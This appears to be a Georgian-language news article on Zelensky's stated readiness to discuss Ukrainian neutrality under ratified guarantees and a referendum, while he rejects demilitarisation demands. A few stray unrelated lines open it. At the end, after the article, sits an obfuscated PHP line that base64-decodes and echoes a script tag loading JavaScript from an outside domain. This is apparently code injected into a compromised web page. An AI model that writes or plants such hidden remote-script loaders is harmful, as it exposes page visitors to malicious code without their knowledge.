celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ დამოუკიდებელ რუს ჟურნალისტებთან ინტერვიუში განაცხადა, რომ რუსეთთან სამშვიდობო შეთანხმების ფარგლებში, უკრაინა მზადაა განიხილოს ნეიტრალური სტატუსის მიღება, მაგრამ ეს უნდა იყოს გარანტირებული მესამე მხარის მიერ და ასევე გატანილ უნდა იქნას რეფერენდუმზე. 
 
"უსაფრთხოების გარანტიები და ნეიტრალიტეტი, ჩვენი სახელმწიფოს არაბირთვული სტატუსი. ჩვენ მზად ვართ ამაზე წავიდეთ. ეს არის ყველაზე მნიშვნელოვანი პუნქტი. ჩვენ საერთოდ არ დავსხდებით მაგიდასთან რაღაც დემილიტარიზაციაზე და დენაციფიკაციაზე სასაუბროდ. ჩემთვის ეს სრულიად გაუგებარი საკითხებია", - განაცხადა უკრაინის პრეზიდენტმა.
 
მან, ასევე, ხაზი გაუსვა, რომ ეს უნდა იყოს სერიოზული შეთანხმება და არა უბრალოდ ბუდაპეშტის მემორანდუმის მსგავსი ფურცელი.
 
„უსაფრთხოების გარანტიები უკრაინისთვის და მათთვის (რუსეთისთვის) განვიხილავ. ეს ღრმად დამუშავებულია. მაგრამ მე მაინტერესებს, რომ ეს არ იყოს კიდევ ერთი ბუდაპეშტის მემორანდუმის ფურცელი. ჩვენ დაინტერესებული ვართ, რომ ეს ფურცელი იქცეს სერიოზული შეთანხმებად, რომელცი ხელმოწერილი იქნება ყველა გარანტორის მიერ. აუცილებლად უნდა იყოს რატიფიცირებული გარანტორი სახელმწიფოების პარლამენტებში და აუცილებლად უნდა იყოს რეფერენდუმი უკრაინაში.“, — განაცხადა ზელენსკიმ.
 
ინტერვიუში ზელენსკიმ დაადასტურა, რომ უკრაინაში რუსული ენის გამოყენება არის ის, რაც განიხილებოდა უკრაინასა და რუსეთს შორის სამშვიდობო მოლაპარაკებების დროს, მაგრამ მან აღნიშნა, რომ უკრაინამ უარი თქვა რუსეთის სხვა მოთხოვნების განხილვაზე, როგორიცაა მაგალითად უკრაინის დემილიტარიზაცია.
 
„რაც შეეხება რუსული ენის დაცვის საკითხს, მე დელეგაციას დავაბარე, რომ ომის ყოველი შემდეგი დღე კითხვის ნიშნის დააყენებს იმის გაგებას, საერთოდ რა არის რუსული ენა. ადამიანები თავად არ მოინდომებენ რუსულად საუბარს. ჩვენთან ყველა საუბრობს, რა ენაზეც სურს. ამიტომ ჩვენ ვთქვით, რომ მხოლოდ სარკისებრი პატივისცემა შეიძლება იყოს კულტურის, ენისა და საერთო ფასეულობების შესახებ ყველა მეზობელთან. მე ამას ვიღებ. ეს ყველაფერი მაინც სახალხო გამოკითხვით გადაწყდება“, — თქვა ზელენსკიმ.
 
 
 
801
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");